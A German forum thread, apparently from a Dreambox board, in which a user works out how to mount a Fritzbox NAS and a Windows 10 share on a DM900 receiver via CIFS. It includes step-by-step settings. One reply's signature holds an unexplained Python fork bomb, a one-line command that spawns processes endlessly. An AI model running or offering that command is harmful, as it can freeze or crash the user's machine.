[gelöst] Netzwerkverbindungen mit FritzNas und Windows-PC klappen nicht

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • [gelöst] Netzwerkverbindungen mit FritzNas und Windows-PC klappen nicht

      Hallo,

      ich möchte von meiner DM900 aus auf das FritzNas meiner Fritzbox 7490 und auf ein Laufwerk auf meinem Familien-PC zugreifen.
      Den Netzwerkbrowser habe ich auf meiner DM900 in Betrieb.
      In der Netzwerkumgebung wird dort folgendes angezeigt:

      192.168.?.1 (FRITZ-NAS)
      192.168?.? (Dreambox2) - das ist meine DM8000 im Schlafzimmer
      192.168.?.? (FAMILIENPC)

      Den Zugriff auf die Festoplatte meiner Dreambox2 (DM8000) habe ich bereits eingerichtet und dieser funktioniert auch.

      Wenn ich allerdings über den Netzwerkbrowser meiner DM900 in der Netzwerkumgebung (s.o) die Einträge FRITZ-NAS oder FAMILIENPC anklicke, um eine Verbindung herzustellen, dann werde ich lediglich gefragt, ob ich einen Benutzernamen und ein Passwort vergeben möchte, was ich jeweils verneine.
      Danach passiert aber nichts. Es werden nicht (wie bei der Verbindung mit der DM8000) irgendwelche Ordner geöffnet mit denen ich mich verbinden könnte.
      In der Fritzbox habe ich das FritzNas mitsamt der angeschlossenen Festplatte freigegeben. Ich habe auch schon einen Fritzbox-Benutzer angelegt.
      Auf dem Familien-PC habe ich das gewüschte Laufwerk freigegeben.

      Nun bin ich ratlos, weil ich schon 3 Tage rumprobiere.
      Vermutlich ist es nur ein kleiner Schritt der zu gehen ist, nur ich weiß ihn nicht.

      Vielen Dank im Voraus für jede Hilfe.


      Teiresias
    • Halleluja,

      das erste Problem ist gelöst. Die Verbindung mit dem FritzNas der 7490 ist hergestellt.
      Ich möchte andere User mit dem gleichen Problem nicht im Regen stehen lassen, weshalb ich hier meine Lösung poste:

      1. Einstellungen an der Fritzbox
      a) Heimnetz/Speicher(NAS) - Haken setzen bei Speicher (NAS) aktiv und USB-Speicher
      b) System/Fritz!Box-Benutzer
      Neuen Benutzer anlegen mit z.B. Benutzername "Ratlos" und Kennwort "Schaf"
      Alle Haken raus, nur das NAS freigeben (also Haken rein)

      2. Einstellungen an der DM900
      a) Netzwerkbrowser installieren (falls noch nicht vorhanden) und öffnen
      b) dort das FritzNas anklicken
      c) die Frage nach Benutzernamen und Kennwort mit ja beantworten und "Ratlos" und "Schaf" eingeben
      d) es öffnet sich das freigegebene NAS. Diese einhängen.

      3. weitere Einstellungen
      Wenn man z.B. die Filmdateien auf dem NAS über die Advanced Movie Selection öffnen möchte, dann muss man die Bookmark nicht für das NAS selbst sondern für den jeweiligen Unterordner setzen.

      Ich hoffe, ich konnte helfen und versuch mich nun an meine PC-Lafwerk weiter.

      Teiresias

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von Teiresias ()

    • Die dreamboxen können unterschiedliche Übertragungsprotokolle. Im Networkbrowser der dreambox sieht man z.B. bei QNAP-NASsen (ist das die Mehrzahl ?) CFIS- und NFS-Einbindungen, weil beide Seiten beide Protokolle können. NFS brauch kein Passwort, weil da bei NAS die Berechtigungen differenzierter konfiguriert werden können. Meist reicht dort nur die IP der dreambox und es läuft.
      Die FritzBoxen können meines Wissens nach kein NFS. Da wird es wohl über das CFIS-Netzwerkprotokoll laufen. Da verlangt dann die FritzBox, wie Du selbst festgestellt hast, Nutzername und Passwort.
      Für Windows müsste da möglicherweise erst das CFIS-Protokoll aktiviert oder nachinstalliert werden. Als Mac-User kenne ich mich mit Windows nicht wirklich gut aus.

      Hier findest Du aber Mitglieder, welche Dir sicherlich weiterhelfen können.
      Grüsse aus dem "ganz Nahen Osten" vom Burkhardtsdorfer

      Der Mensch wird geboren, blamiert sich, und stirbt!
    • Die Fritzboxen verwenden unterschiedliche Sicherheitseinstellungen in den mount optionen manche verwenden sec=ntlmv2 manche sec=ntlmv oder sec=ntlm aber bei deinen mageren infos über die hardware musste halt ausprobieren.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hallo,

      auch zur Verindung eines Windows 10 Rechners mit der DM900 meine Lösung, die ich gefunden habe.
      Ziel war es, die Fotos und Videos auf dem Windows 10 PC auf der DM900 abzuspielen.

      1. Einstellungen auf dem Windows 10 PC:
      a) Explorer öffnen
      b) freizugebendes Laufwerk mit der rechten Maustaste öffnen
      c) Eigenschaften/Freigabe/Erweiterte Freigabe
      d) Haken in "Diesen Ordner freigeben"
      e) Namen für den Ordner vergeben z.B "FAMILIENPC"
      f) übernehmen und speichern

      2. Einstellungen auf der DM900:
      a) Menü/Einstellungen/Netzwerk/ Mount Manager
      b) Netzwerkfreigabe hinzufügen
      c) Freigabe mit folgenden Parametern befüllen

      Aktiv ............................................. an
      Lokaler Freigabename ...............PC (beliebig wählbar)
      Freigabetyp .................................CIFS Freigabe
      Server IP ......................................192.168.?.? (hier IP des PC eingeben)
      Serverfreigabe ............................FAMILIENPC
      als HDD Ersatz nutzen ...............nein
      Freigabeoptionen
      Benutzername ...........................Anmeldename für den PC bei Microsoft (bei mir die Emailadresse)
      Passwort .....................................Passwort für Microsoft
      (nochmals zu Klarstellung: hier müsst ihr die Anmeldedaten eingeben, die ihr benutzt, um eu an eurem PC anzumelden)

      Anmerkung für den Admin: Für mich ist das Problem gelöst.

      Ich hoffe, dass ich auch anderen ein bißchen weiterhelfen konnte.


      Teiresias

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Teiresias ()